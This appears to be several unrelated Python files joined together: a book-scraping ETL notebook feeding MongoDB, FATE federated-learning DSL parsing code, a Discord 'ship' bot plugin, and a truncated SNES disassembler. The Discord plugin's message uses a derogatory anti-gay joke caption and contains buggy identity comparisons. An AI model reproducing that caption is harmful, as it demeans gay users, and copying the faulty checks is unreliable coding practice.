time.sleep(randint(1,2))
link = article.find('a')
href = link["href"]
print("----------")
print(href)
url = href
browser.visit(url)
time.sleep(1)
res=requests.get(url)
soup = BeautifulSoup(res.content,'lxml')
data = soup.find_all('div', attrs={'class': 'detail-text mb-50'})[0].get_text()
data_on_page.append(data)
table_of_data.append(data_on_page)
df = pd.DataFrame(data_on_page)[0]
print(data)
browser.quit()
# In[280]:
df.to_csv('asian.csv')
# In[281]:
df_asian_classics_to_clean=pd.read_csv('asian.csv')
df_asian_classics_to_clean_columns = df_asian_classics_to_clean.drop(columns=['Unnamed: 0'])
# In[282]:
df_asian_classics_to_clean_columns
# In[283]:
df_asian_classics_to_clean_columns_split = df_asian_classics_to_clean_columns['0'].str.split("\n\t")
# In[284]:
df_asian_classics = df_asian_classics_to_clean_columns_split.to_list()
column_names = ['0','ISBN-10','ISBN-13','Publisher','Publish Date', 'Dimensions']
new_asian_classics_df = pd.DataFrame(df_asian_classics,columns=column_names)
# In[285]:
clean_asian_classics_df=new_asian_classics_df.drop(columns=['0','Dimensions'])
# In[286]:
clean_asian_classics_df.head()
# In[287]:
html_chars = ["<tr>","\n","</th>","<th>","<td>","</td>",
"</tr>",'\t']
for char in html_chars:
clean_asian_classics_df['ISBN-10'] = clean_asian_classics_df['ISBN-10'].str.replace(char, ' ')
clean_asian_classics_df['ISBN-13'] = clean_asian_classics_df['ISBN-13'].str.replace(char, ' ')
clean_asian_classics_df['Publisher'] = clean_asian_classics_df['Publisher'].str.replace(char, ' ')
clean_asian_classics_df['Publish Date'] = clean_asian_classics_df['Publish Date'].str.replace(char, ' ')
# In[288]:
pd.set_option("max_colwidth", 1000)
clean_asian_classics_df.head()
# In[ ]:
# In[ ]:
# In[ ]:
# In[391]:
greek_roman_clean_for_combine_df = pd.read_csv('greek-roman-clean.csv')
# In[392]:
greek_roman_clean_for_combine_df
# In[402]:
greek_roman_clean_for_combine_df['ISBN-10'] = greek_roman_clean_for_combine_df['ISBN-10'].map(lambda x: x.lstrip('ISBN-10: '))
greek_roman_clean_for_combine_df
# In[403]:
greek_roman_clean_for_combine_df.dtypes
# In[382]:
# In[ ]:
# In[404]:
greek_roman_clean_for_combine_df
# In[ ]:
# In[ ]:
# In[346]:
#https://stackoverflow.com/questions/18039057/python-pandas-error-tokenizing-data
books_df = pd.read_csv('Data/books.csv',error_bad_lines=False)
# In[347]:
books_df.head()
# In[ ]:
# In[352]:
#change column names
books_columns_df=books_df.rename(columns={"isbn": "ISBN-10", "isbn13": "ISBN-13"})
# In[397]:
books_columns_df.dtypes
# In[405]:
books_columns_df['ISBN-10'] = books_columns_df['ISBN-10'].map(lambda x: x.lstrip('0'))
# In[406]:
books_columns_df
# In[ ]:
# In[ ]:
# In[ ]:
# In[421]:
merged_df = books_columns_df.merge(greek_roman_clean_for_combine_df,on='ISBN-10',how='outer')
# In[425]:
merged_df.tail()
# In[423]:
merged_drop_nan_df=merged_df.dropna()
# In[424]:
merged_drop_nan_df
# In[427]:
data1 = books_df.to_dict(orient = 'records')
data1
# In[428]:
data2 = greek_roman_clean_for_combine_df.to_dict(orient = 'records')
data2
# In[431]:
#books_df
#greek_roman_clean_for_combine_df
import pymongo
import pandas as pd
import json
connection_string = "mongodb://localhost:27017"
client = pymongo.MongoClient(connection_string)
db = client["Project2"]
db.Books.insert_many(data1)
db.Greek_Roman.insert_many(data2)
print("ETL Complete")
# In[ ]:
# In[ ]:
|
<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from fate_arch.computing import is_table
from federatedml.util import LOGGER
class RunningFuncs(object):
def __init__(self):
self.todo_func_list = []
self.todo_func_params = []
self.save_result = []
self.use_previews_result = []
def add_func(self, func, params, save_result=False, use_previews=False):
self.todo_func_list.append(func)
self.todo_func_params.append(params)
self.save_result.append(save_result)
self.use_previews_result.append(use_previews)
def __iter__(self):
for func, params, save_result, use_previews in zip(self.todo_func_list, self.todo_func_params,
self.save_result, self.use_previews_result):
yield func, params, save_result, use_previews
class DSLConfigError(ValueError):
pass
class ComponentProperties(object):
def __init__(self):
self.need_cv = False
self.need_run = False
self.need_stepwise = False
self.has_model = False
self.has_isometric_model = False
self.has_train_data = False
self.has_eval_data = False
self.has_validate_data = False
self.has_test_data = False
self.has_normal_input_data = False
self.role = None
self.host_party_idlist = []
self.local_partyid = -1
self.guest_partyid = -1
self.input_data_count = 0
self.input_eval_data_count = 0
def parse_component_param(self, component_parameters, param):
try:
need_cv = param.cv_param.need_cv
except AttributeError:
need_cv = False
self.need_cv = need_cv
LOGGER.debug(component_parameters)
try:
need_run = param.need_run
except AttributeError:
need_run = True
self.need_run = need_run
LOGGER.debug("need_run: {}, need_cv: {}".format(self.need_run, self.need_cv))
try:
need_stepwise = param.stepwise_param.need_stepwise
except AttributeError:
need_stepwise = False
self.need_stepwise = need_stepwise
self.role = component_parameters["local"]["role"]
self.host_party_idlist = component_parameters["role"].get("host")
self.local_partyid = component_parameters["local"].get("party_id")
self.guest_partyid = component_parameters["role"].get("guest")
if self.guest_partyid is not None:
self.guest_partyid = self.guest_partyid[0]
return self
def parse_dsl_args(self, args):
if "model" in args:
self.has_model = True
if "isometric_model" in args:
self.has_isometric_model = True
data_sets = args.get("data")
LOGGER.debug(f"parse_dsl_args data_sets: {data_sets}")
if data_sets is None:
return self
for data_key, data_dicts in data_sets.items():
data_keys = list(data_dicts.keys())
for data_type in ["train_data", "eval_data", "validate_data", "test_data"]:
if data_type in data_keys:
setattr(self, f"has_{data_type}", True)
data_keys.remove(data_type)
LOGGER.debug(f"[Data Parser], has_{data_type}:"
f" {getattr(self, f'has_{data_type}')}")
if len(data_keys) > 0:
self.has_normal_input_data = True
LOGGER.debug("[Data Parser], has_normal_data: {}".format(self.has_normal_input_data))
if self.has_eval_data:
if self.has_validate_data or self.has_test_data:
raise DSLConfigError("eval_data input should not be configured simultaneously"
" with validate_data or test_data")
# self._abnormal_dsl_config_detect()
return self
def _abnormal_dsl_config_detect(self):
if self.has_validate_data:
if not self.has_train_data:
raise DSLConfigError("validate_data should be configured simultaneously"
" with train_data")
if self.has_train_data:
if self.has_normal_input_data or self.has_test_data:
raise DSLConfigError("train_data input should not be configured simultaneously"
" with data or test_data")
if self.has_normal_input_data:
if self.has_train_data or self.has_validate_data or self.has_test_data:
raise DSLConfigError("When data input has been configured, train_data, "
"validate_data or test_data should not be configured.")
if self.has_test_data:
if not self.has_model:
raise DSLConfigError("When test_data input has been configured, model "
"input should be configured too.")
if self.has_model:
if self.has_train_data:
raise DSLConfigError("train_data input and model input should not be "
"configured simultaneously")
if self.has_isometric_model:
raise DSLConfigError("model and isometric_model should not be "
"configured simultaneously")
if not self.has_test_data and not self.has_normal_input_data:
raise DSLConfigError("When model has been set, either test_data or "
"data should be provided")
if self.need_cv or self.need_stepwise:
if not self.has_train_data:
raise DSLConfigError("Train_data should be configured in cross-validate "
"task or stepwise task")
if self.has_validate_data or self.has_normal_input_data or \
self.has_test_data:
raise DSLConfigError("Train_data should be set only in cross-validate "
"task or stepwise task")
if self.has_model or self.has_isometric_model:
raise DSLConfigError("In cross-validate task or stepwise task, model "
"or isometric_model should not be configured")
def extract_input_data(self, args, model):
data_sets = args.get("data")
model_data = {}
data = {}
if data_sets is None:
return model_data, data
LOGGER.debug(f"Input data_sets: {data_sets}")
for cpn_name, data_dict in data_sets.items():
for data_type in ["train_data", "eval_data", "validate_data", "test_data"]:
if data_type in data_dict:
d_table = data_dict.get(data_type)
model_data[data_type] = model.obtain_data(d_table)
del data_dict[data_type]
if len(data_dict) > 0:
LOGGER.debug(f'data_dict: {data_dict}')
for k, v in data_dict.items():
data_list = model.obtain_data(v)
LOGGER.debug(f"data_list: {data_list}")
if isinstance(data_list, list):
for i, data_i in enumerate(data_list):
data[".".join([cpn_name, k, str(i)])] = data_i
else:
data[".".join([cpn_name, k])] = data_list
train_data = model_data.get('train_data')
validate_data = None
if self.has_train_data:
if self.has_eval_data:
validate_data = model_data.get('eval_data')
elif self.has_validate_data:
validate_data = model_data.get('validate_data')
test_data = None
if self.has_test_data:
test_data = model_data.get('test_data')
self.has_test_data = True
elif self.has_eval_data and not self.has_train_data:
test_data = model_data.get('eval_data')
self.has_test_data = True
# self.has_train_data = True if train_data else False
# self.has_validate_data = True if (validate_data or self.has_eval_data) else False
if validate_data or (self.has_train_data and self.has_eval_data):
self.has_validate_data = True
if self.has_train_data and is_table(train_data):
self.input_data_count = train_data.count()
elif self.has_normal_input_data:
for data_key, data_table in data.items():
if is_table(data_table):
self.input_data_count = data_table.count()
if self.has_validate_data and is_table(validate_data):
self.input_eval_data_count = validate_data.count()
self._abnormal_dsl_config_detect()
LOGGER.debug(f"train_data: {train_data}, validate_data: {validate_data}, "
f"test_data: {test_data}, data: {data}")
return train_data, validate_data, test_data, data
def extract_running_rules(self, args, model):
# train_data, eval_data, data = self.extract_input_data(args)
train_data, validate_data, test_data, data = self.extract_input_data(args, model)
running_funcs = RunningFuncs()
schema = None
for d in [train_data, validate_data, test_data]:
if d is not None:
schema = d.schema
break
if not self.need_run:
running_funcs.add_func(model.pass_data, [data], save_result=True)
return running_funcs
if self.need_cv:
running_funcs.add_func(model.cross_validation, [train_data])
return running_funcs
if self.need_stepwise:
running_funcs.add_func(model.stepwise, [train_data], save_result=True)
running_funcs.add_func(self.union_data, ["train"], use_previews=True, save_result=True)
running_funcs.add_func(model.set_predict_data_schema, [schema],
use_previews=True, save_result=True)
return running_funcs
if self.has_model or self.has_isometric_model:
running_funcs.add_func(model.load_model, [args])
if self.has_train_data and self.has_validate_data:
# todo_func_list.extend([model.set_flowid, model.fit, model.set_flowid, model.predict])
# todo_func_params.extend([['fit'], [train_data], ['validate'], [train_data, 'validate']])
running_funcs.add_func(model.set_flowid, ['fit'])
running_funcs.add_func(model.fit, [train_data, validate_data])
running_funcs.add_func(model.set_flowid, ['validate'])
running_funcs.add_func(model.predict, [train_data], save_result=True)
running_funcs.add_func(model.set_flowid, ['predict'])
running_funcs.add_func(model.predict, [validate_data], save_result=True)
running_funcs.add_func(self.union_data, ["train", "validate"], use_previews=True, save_result=True)
running_funcs.add_func(model.set_predict_data_schema, [schema],
use_previews=True, save_result=True)
elif self.has_train_data:
running_funcs.add_func(model.set_flowid, ['fit'])
running_funcs.add_func(model.fit, [train_data])
running_funcs.add_func(model.set_flowid, ['validate'])
running_funcs.add_func(model.predict, [train_data], save_result=True)
running_funcs.add_func(self.union_data, ["train"], use_previews=True, save_result=True)
running_funcs.add_func(model.set_predict_data_schema, [schema],
use_previews=True, save_result=True)
elif self.has_test_data:
running_funcs.add_func(model.set_flowid, ['predict'])
running_funcs.add_func(model.predict, [test_data], save_result=True)
running_funcs.add_func(self.union_data, ["predict"], use_previews=True, save_result=True)
running_funcs.add_func(model.set_predict_data_schema, [schema],
use_previews=True, save_result=True)
if self.has_normal_input_data and not self.has_model:
running_funcs.add_func(model.extract_data, [data], save_result=True)
running_funcs.add_func(model.set_flowid, ['fit'])
running_funcs.add_func(model.fit, [], use_previews=True, save_result=True)
if self.has_normal_input_data and self.has_model:
running_funcs.add_func(model.extract_data, [data], save_result=True)
running_funcs.add_func(model.set_flowid, ['transform'])
running_funcs.add_func(model.transform, [], use_previews=True, save_result=True)
return running_funcs
@staticmethod
def union_data(previews_data, name_list):
if len(previews_data) == 0:
return None
if any([x is None for x in previews_data]):
return None
assert len(previews_data) == len(name_list)
result_data = None
for data, name in zip(previews_data, name_list):
# LOGGER.debug("before mapValues, one data: {}".format(data.first()))
data = data.mapValues(lambda value: value + [name])
# LOGGER.debug("after mapValues, one data: {}".format(data.first()))
if result_data is None:
result_data = data
else:
LOGGER.debug(f"Before union, t1 count: {result_data.count()}, t2 count: {data.count()}")
result_data = result_data.union(data)
LOGGER.debug(f"After union, result count: {result_data.count()}")
# LOGGER.debug("before out loop, one data: {}".format(result_data.first()))
return result_data
def set_union_func(self, func):
self.union_data = func
|
from util import Events
from PIL import Image
import urllib.request
import re
import os
import unicodedata
# rudimentary regex match for finding syllables
SYLLABLE = "([aeiouyAEIOUY]|[0-9])"
class Plugin(object):
def __init__(self, pm):
self.pm = pm
@staticmethod
def register_events():
"""
Define events that this plugin will listen to
:return: A list of util.Events
"""
return [Events.Command("ship")]
async def handle_command(self, message_object, command, args):
"""
Handle Events.Command events
:param message_object: discord.Message object containing the message
:param command: The name of the command (first word in the message, without prefix)
:param args: List of words in the message
"""
if command == "ship":
await self.ship(message_object)
async def ship(self, message_object):
"""
Execute the example_command command. All calls to self.pm.client should be asynchronous (await)!
:param message_object: discord.Message object
:param user_IDs: IDs of users to ship
"""
if not os.path.exists("cache/"):
os.mkdir("cache/")
if not os.path.exists("cache/avatar/"):
os.mkdir("cache/avatar/")
if len(message_object.mentions) is 2:
user1 = message_object.mentions[0]
user2 = message_object.mentions[1]
elif len(message_object.mentions) is 1:
user1 = message_object.mentions[0]
user2 = message_object.mentions[0]
else:
await self.pm.client.send_message(message_object.channel,
"Please **mention** two users!")
return
# generate ship name
n1 = user1.display_name
n2 = user2.display_name
u1_parts = re.split(SYLLABLE, n1)
# needed to maintain vowels in split
u1_parts = [u1_parts[i] + u1_parts[i + 1] for i in range(len(u1_parts) - 1)[0::2]]
u2_parts = re.split(SYLLABLE, n2)
u2_parts = [u2_parts[i] + u2_parts[i + 1] for i in range(len(u2_parts) - 1)[0::2]]
# concatenate half of u1 syllables with u2 syllables(integer division, ew...)
# dumb fix for words that cannot be split (non-latin character sets?)
if len(u1_parts) is 0:
u1_parts = [n1]
if len(u2_parts) is 0:
u2_parts = [n2]
name = u1_parts[:len(u1_parts) // 2] + u2_parts[len(u2_parts) // 2:]
name = "".join(name)
# checks if last letter is omitted(bug fix, can be made more elegant)
if name[-1] is not user2.display_name[-1]:
name = name + user2.display_name[-1]
# Generate Ship Image(clean up)
# download/access images first
user1_img = self.get_avatar(user1)
if user1 is user2:
images = [Image.open(user1_img).resize((256, 256)), Image.open('images/ship/ship.png'),
Image.open('images/ship/hand.png')]
else:
user2_img = self.get_avatar(user2)
images = [Image.open(user1_img).resize((256, 256)), Image.open('images/ship/ship.png'),
Image.open(user2_img).resize((256, 256))]
# combines images horizontally
with open("ship.png", 'wb+') as f:
new_im = Image.new('RGBA', (768, 256), (0, 0, 0, 0))
new_im.paste(images[0], (0, 0))
new_im.paste(images[1], (256, 0), mask=images[1])
new_im.paste(images[2], (512, 0))
new_im.save(f, "PNG")
with open("ship.png", 'rb') as f:
await self.pm.client.send_file(
message_object.channel, f, filename=None, content="""
**{}** *Lmao look at this gay shit*""".format(name))
f.close()
temp_images = [img for img in os.listdir(".") if img.endswith(".png") or img.endswith(".jpg")]
for img in temp_images:
os.remove(img)
@staticmethod
def get_avatar(user):
if not os.path.exists("cache/"):
os.makedirs("cache")
if user.avatar_url is "" or None:
url = user.default_avatar_url
path = "cache/avatar/default_" + user.id + ".png"
else:
url = user.avatar_url
path = "cache/avatar/" + user.avatar + ".png"
if os.path.isfile(path):
return path
else:
hdr = {'User-Agent': 'Mozilla/5.0'}
req = urllib.request.Request(url, headers=hdr)
page = urllib.request.urlopen(req)
data = page.read()
f = open(path, 'wb+')
f.write(data)
f.close()
return path
|
<filename>main.py
from enum import Enum, auto
import collections
import io
import json
class AddressMode(Enum):
Sig8 = auto(),
Imm8 = auto(),
Imm16 = auto(),
ImmX = auto(),
ImmM = auto(),
Abs = auto(),
AbsIdxXInd = auto(),
AbsIdxX = auto(),
AbsIdxY = auto(),
AbsInd = auto(),
AbsIndLng = auto(),
AbsLngIdxX = auto(),
AbsLng = auto(),
AbsJmp = auto(),
AbsLngJmp = auto(),
Acc = auto(),
BlkMov = auto(),
DirIdxIndX = auto(),
DirIdxX = auto(),
DirIdxY = auto(),
DirIndIdxY = auto(),
DirIndLngIdxY = auto(),
DirIndLng = auto(),
DirInd = auto(),
Dir = auto(),
Imp = auto(),
RelLng = auto(),
Rel = auto(),
Stk = auto(),
StkRel = auto(),
StkRelIndIdxY = auto()
class MemoryMode(Enum):
EIGHT_BIT = auto()
SIXTEEN_BIT = auto()
ASSEMBLY_OUTPUT_LINE_WIDTH = 60
NUM_BANKS = 8
BANK_SIZE = 0x10000
BANK_START = 0x80
ROM_RESET_ADDR = 0xFFFC
ROM_NMI_ADDR = 0xFFEA
ROM_IRQ_ADDR = 0xFFEE
InstructionInfo = collections.namedtuple('InstructionInfo', 'memory_mode index_mode runtime_addr func_names')
hardware_registers = {
"$2100": "!SCREEN_DISPLAY_REGISTER",
"$2101": "!OAM_SIZE_AND_DATA_AREA_DESIGNATION",
"$2102": "!ADDRESS_FOR_ACCESSING_OAM_LOW",
"$2103": "!ADDRESS_FOR_ACCESSING_OAM_HIGH",
"$2105": "!BG_MODE_AND_TILE_SIZE_SETTING",
"$2106": "!MOSAIC_SIZE_AND_BG_ENABLE",
"$2107": "!BG_1_ADDRESS_AND_SIZE",
"$2108": "!BG_2_ADDRESS_AND_SIZE",
"$2109": "!BG_3_ADDRESS_AND_SIZE",
"$210A": "!BG_4_ADDRESS_AND_SIZE",
"$210B": "!BG_1_AND_2_TILE_DATA_DESIGNATION",
"$210C": "!BG_3_AND_4_TILE_DATA_DESIGNATION",
"$210D": "!BG_1_H_SCROLL_OFFSET",
"$210E": "!BG_1_V_SCROLL_OFFSET",
"$210F": "!BG_2_H_SCROLL_OFFSET",
"$2110": "!BG_2_V_SCROLL_OFFSET",
"$2111": "!BG_3_H_SCROLL_OFFSET",
"$2112": "!BG_3_V_SCROLL_OFFSET",
"$2113": "!BG_4_H_SCROLL_OFFSET",
"$2114": "!BG_4_V_SCROLL_OFFSET",
"$2115": "!VRAM_ADDRESS_INCREMENT_VALUE",
"$2116": "!ADDRESS_FOR_VRAM_READ_WRITE_LOW_BYTE",
"$2117": "!ADDRESS_FOR_VRAM_READ_WRITE_HIGH_BYTE",
"$211A": "!INITIAL_SETTING_FOR_MODE_7",
"$211B": "!MODE_7_MATRIX_PARAMETER_A",
"$211C": "!MODE_7_MATRIX_PARAMETER_B",
"$211D": "!MODE_7_MATRIX_PARAMETER_C",
"$211E": "!MODE_7_MATRIX_PARAMETER_D",
"$211F": "!MODE_7_CENTER_POSITION_X",
"$2120": "!MODE_7_CENTER_POSITION_Y",
"$2121": "!ADDRESS_FOR_CG_RAM_WRITE",
"$2123": "!BG_1_AND_2_WINDOW_MASK_SETTINGS",
"$2124": "!BG_3_AND_4_WINDOW_MASK_SETTINGS",
"$2125": "!OBJ_AND_COLOR_WINDOW_SETTINGS",
"$2126": "!WINDOW_1_LEFT_POSITION_DESIGNATION",
"$2127": "!WINDOW_1_RIGHT_POSITION_DESIGNATION",
"$2128": "!WINDOW_2_LEFT_POSTION_DESIGNATION",
"$2129": "!WINDOW_2_RIGHT_POSTION_DESIGNATION",
"$212A": "!BG_1_2_3_4_WINDOW_LOGIC_SETTINGS",
"$212B": "!COLOR_AND_OBJ_WINDOW_LOGIC_SETTINGS",
"$212C": "!BG_AND_OBJECT_ENABLE_MAIN_SCREEN",
"$212D": "!BG_AND_OBJECT_ENABLE_SUB_SCREEN",
"$212E": "!WINDOW_MASK_DESIGNATION_FOR_MAIN_SCREEN",
"$212F": "!WINDOW_MASK_DESIGNATION_FOR_SUB_SCREEN",
"$2130": "!INITIAL_SETTINGS_FOR_COLOR_ADDITION",
"$2131": "!ADD_SUBTRACT_SELECT_AND_ENABLE",
"$2132": "!FIXED_COLOR_DATA",
"$2133": "!SCREEN_INITIAL_SETTINGS",
"$2140": "!APU_I_O_PORT_0",
"$2141": "!APU_I_O_PORT_1",
"$2142": "!APU_I_O_PORT_2",
"$2143": "!APU_I_O_PORT_3",
"$4016": "!JOY_A",
"$4017": "!JOY_B",
"$4200": "!NMI_V_H_COUNT_AND_JOYPAD_ENABLE",
"$4201": "!PROGRAMMABLE_I_O_PORT_OUTPUT",
"$4202": "!MULTIPLICAND_A",
"$4203": "!MULTIPLIER_B",
"$4204": "!DIVIDEND_LOW_BYTE",
"$4205": "!DIVIDEND_HIGH_BYTE",
"$4206": "!DIVISOR_B",
"$4207": "!H_COUNT_TIMER",
"$4208": "!H_COUNT_TIMER_MSB",
"$4209": "!V_COUNT_TIMER",
"$420A": "!V_COUNT_TIMER_MSB",
"$420B": "!REGULAR_DMA_CHANNEL_ENABLE",
"$420C": "!H_DMA_CHANNEL_ENABLE",
"$420D": "!CYCLE_SPEED_DESIGNATION",
"$4210": "!NMI_ENABLE",
"$4211": "!IRQ_FLAG_BY_H_V_COUNT_TIMER",
"$4212": "!H_V_BLANK_FLAGS_AND_JOYPAD_STATUS",
"$4218": "!JOYPAD_1_DATA_LOW_BYTE",
"$4219": "!JOYPAD_1_DATA_HIGH_BYTE",
"$421A": "!JOYPAD_2_DATA_LOW_BYTE",
"$421B": "!JOYPAD_2_DATA_HIGH_BYTE",
"$421E": "!JOYPAD_4_DATA_LOW_BYTE",
"$421F": "!JOYPAD_4_DATA_HIGH_BYTE",
"$4300": "!DMA_0_PARAMS",
"$4301": "!DMA_0_B_ADDRESS",
"$4302": "!DMA_0_A_ADDRESS_LOW_BYTE",
"$4303": "!DMA_0_A_ADDRESS_HIGH_BYTE",
"$4304": "!DMA_0_A_ADDRESS_BANK",
"$4305": "!DMA_0_BYTES_COUNT_LOW_BYTE",
"$4306": "!DMA_0_BYTES_COUNT_HIGH_BYTE",
"$4310": "!DMA_1_PARAMS",
"$4311": "!DMA_1_B_ADDRESS",
"$4312": "!DMA_1_A_ADDRESS_LOW_BYTE",
"$4313": "!DMA_1_A_ADDRESS_HIGH_BYTE",
"$4314": "!DMA_1_A_ADDRESS_BANK",
"$4315": "!DMA_1_BYTES_COUNT_LOW_BYTE",
"$4316": "!DMA_1_BYTES_COUNT_HIGH_BYTE",
"$4320": "!DMA_2_PARAMS",
"$4321": "!DMA_2_B_ADDRESS",
"$4322": "!DMA_2_A_ADDRESS_LOW_BYTE",
"$4323": "!DMA_2_A_ADDRESS_HIGH_BYTE",
"$4324": "!DMA_2_A_ADDRESS_BANK",
"$4325": "!DMA_2_BYTES_COUNT_LOW_BYTE",
"$4326": "!DMA_2_BYTES_COUNT_HIGH_BYTE",
"$4330": "!DMA_3_PARAMS",
"$4331": "!DMA_3_B_ADDRESS",
"$4332": "!DMA_3_A_ADDRESS_LOW_BYTE",
"$4333": "!DMA_3_A_ADDRESS_HIGH_BYTE",
"$4334": "!DMA_3_A_ADDRESS_BANK",
"$4335": "!DMA_3_BYTES_COUNT_LOW_BYTE",
"$4336": "!DMA_3_BYTES_COUNT_HIGH_BYTE",
"$4340": "!DMA_4_PARAMS",
"$4341": "!DMA_4_B_ADDRESS",
"$4342": "!DMA_4_A_ADDRESS_LOW_BYTE",
"$4343": "!DMA_4_A_ADDRESS_HIGH_BYTE",
"$4344": "!DMA_4_A_ADDRESS_BANK",
"$4345": "!DMA_4_BYTES_COUNT_LOW_BYTE",
"$4346": "!DMA_4_BYTES_COUNT_HIGH_BYTE",
"$4350": "!DMA_5_PARAMS",
"$4351": "!DMA_5_B_ADDRESS",
"$4352": "!DMA_5_A_ADDRESS_LOW_BYTE ",
"$4353": "!DMA_5_A_ADDRESS_HIGH_BYTE",
"$4354": "!DMA_5_A_ADDRESS_BANK",
"$4355": "!DMA_5_BYTES_COUNT_LOW_BYTE",
"$4356": "!DMA_5_BYTES_COUNT_HIGH_BYTE",
"$4360": "!DMA_6_PARAMS",
"$4361": "!DMA_6_B_ADDRESS",
"$4362": "!DMA_6_A_ADDRESS_LOW_BYTE",
"$4363": "!DMA_6_A_ADDRESS_HIGH_BYTE",
"$4364": "!DMA_6_A_ADDRESS_BANK",
"$4365": "!DMA_6_BYTES_COUNT_LOW_BYTE",
"$4366": "!DMA_6_BYTES_COUNT_HIGH_BYTE",
"$4370": "!DMA_7_PARAMS",
"$4371": "!DMA_7_B_ADDRESS",
"$4372": "!DMA_7_A_ADDRESS_LOW_BYTE",
"$4373": "!DMA_7_A_ADDRESS_HIGH_BYTE",
"$4374": "!DMA_7_A_ADDRESS_BANK",
"$4375": "!DMA_7_BYTES_COUNT_LOW_BYTE",
"$4376": "!DMA_7_BYTES_COUNT_HIGH_BYTE",
"$4216": "!PRODUCT_REMAINDER_RESULT_LOW_BYTE",
"$2118": "!DATA_FOR_VRAM_WRITE_LOW_BYTE",
"$4214": "!QUOTIENT_OF_DIVIDE_RESULT_LOW_BYTE",
"$006000": "!DSP1_DATA_REGISTER",
"$007000": "!DSP1_STATUS_REGISTER"
}
def get_operand_size(addr_mode, current_memory_mode, current_index_mode):
if addr_mode in [AddressMode.Acc, AddressMode.Imp, AddressMode.Stk]:
return 0
elif addr_mode in [AddressMode.DirIdxIndX, AddressMode.DirIdxX, AddressMode.DirIdxY, AddressMode.DirIndIdxY,
AddressMode.DirIndLngIdxY, AddressMode.DirIndLng, AddressMode.DirInd, AddressMode.Dir,
AddressMode.Sig8, AddressMode.Imm8, AddressMode.Rel, AddressMode.StkRel,
AddressMode.StkRelIndIdxY]:
return 1
elif addr_mode in [AddressMode.Abs, AddressMode.AbsIdxXInd, AddressMode.AbsIdxX, AddressMode.AbsIdxY,
AddressMode.AbsInd,
AddressMode.AbsIndLng, AddressMode.AbsJmp, AddressMode.BlkMov, AddressMode.Imm16,
AddressMode.RelLng]:
return 2
elif addr_mode in [AddressMode.AbsLngJmp, AddressMode.AbsLngIdxX, AddressMode.AbsLng]:
return 3
if addr_mode is AddressMode.ImmX:
return 1 if current_index_mode is MemoryMode.EIGHT_BIT else 2
elif addr_mode is AddressMode.ImmM:
return 1 if current_memory_mode is MemoryMode.EIGHT_BIT else 2
def open_rom(file):
with open(file, 'rb') as f:
data = f.read()
return data
def open_executed_instruction_addresses(file):
data = []
with open(file, 'r') as f:
for line in f:
info = line.split(" ")
assert len(info) >= 3
memory_mode = int(info[0])
index_mode = int(info[1])
runtime_addr = int(info[2])
func_names = info[3:]
if len(func_names) > 0:
func_names[-1] = func_names[-1].strip()
data.append(InstructionInfo(memory_mode=memory_mode, index_mode=index_mode, runtime_addr=runtime_addr, func_names=func_names))
return data
def open_pc_to_fixed_func_name(file):
data = {}
with open(file, 'r') as f:
for line in f:
info = line.split(" ")
assert len(info) == 2
pc = int(info[0])
offset, _, _ = convert_runtime_address_to_rom(pc)
func_name = info[1].strip()
data[offset] = func_name
return data
def open_jump_tables(file):
data = {}
with open(file, 'r') as f:
for line in f:
info = line.split(" ")
assert len(info) >= 3
pc = int(info[0])
offset, _, _ = convert_runtime_address_to_rom(pc)
jump_table_entries = {}
for i in range(1, len(info), 2):
jump_table_entries[int(info[i])] = info[i+1].strip()
data[offset] = jump_table_entries
return data
def open_return_address_manipulation_functions(file):
data = {}
with open(file, 'r') as f:
for line in f:
info = line.split(" ")
assert len(info) == 2
func_name = info[0]
pc = int(info[1])
data[func_name] = pc
return data
def get_bank_and_offset(addr):
bank = (addr & 0xFF0000) >> 16
bank_offset = (addr & 0x00FFFF)
return bank, bank_offset
def convert_runtime_address_to_rom(addr):
bank, bank_offset = get_bank_and_offset(addr)
if addr < 0x400000:
return addr, bank, bank_offset
if 0x40 <= bank <= 0x7d:
adjusted_address = addr - 0x400000
bank, bank_offset = get_bank_and_offset(adjusted_address)
elif 0x80 <= bank <= 0x9f:
adjusted_address = addr - 0x800000
bank, bank_offset = get_bank_and_offset(adjusted_address)
elif 0xa0 <= bank <= 0xbf:
adjusted_address = addr - 0xa00000 + 0x200000
bank, bank_offset = get_bank_and_offset(adjusted_address)
elif 0xc0 <= bank <= 0xfd:
adjusted_address = addr - 0xc00000
bank, bank_offset = get_bank_and_offset(adjusted_address)
elif 0xfe <= bank <= 0xff:
adjusted_address = addr - 0xc00000
bank, bank_offset = get_bank_and_offset(adjusted_address)
else:
assert False
return adjusted_address, bank, bank_offset
def open_label_addresses(file):
labels = set()
labels_to_functions = {}
with open(file, 'r') as f:
for line in f:
label_info = line.split(" ")
assert len(label_info) >= 3
address = int(label_info[0])
offset, _, _ = convert_runtime_address_to_rom(int(address))
label_entries = {}
for i in range(1, len(label_info), 2):
label_entries[label_info[i]] = bool(int(label_info[i+1]))
labels.add(offset)
labels_to_functions[offset] = label_entries
return labels, labels_to_functions
def get_operand(rom_data, operand_size):
if operand_size == 1:
return rom_data[0]
elif operand_size == 2:
return rom_data[1] << 8 | rom_data[0]
elif operand_size == 3:
return rom_data[2] << 16 | rom_data[1] << 8 | rom_data[0]
return None
def handle_Sig8(v, size=0):
return f"#${v:0{2}X}"
def handle_Imm8(v, size=0):
return f"#${v:0{2}X}"
def handle_Imm16(v, size=0):
return f"${v:0{4}X}"
def handle_ImmX(v, size):
if size == 1:
return (f"#${v:0{2}X}")
else:
return f"#${v:0{4}X}"
def handle_ImmM(v, size):
if size == 1:
return (f"#${v:0{2}X}")
else:
return f"#${v:0{4}X}"
def handle_Abs(v, size=0):
return f"${v:0{4}X}"
def handle_AbsIdxXInd(v, size=0):
return f"(${v:0{4}X},x)"
def handle_AbsIdxX(v, size=0):
return f"${v:0{4}X},x"
def handle_AbsIdxY(v, size=0):
return f"${v:0{4}X},y"
def handle_AbsInd(v, size=0):
return f"(${v:0{4}X})"
def handle_AbsIndLng(v, size=0):
return f"[${v:0{4}X}]"
def handle_AbsLngIdxX(v, size=0):
return f"${v:0{6}X},x"
def handle_AbsLng(v, size=0):
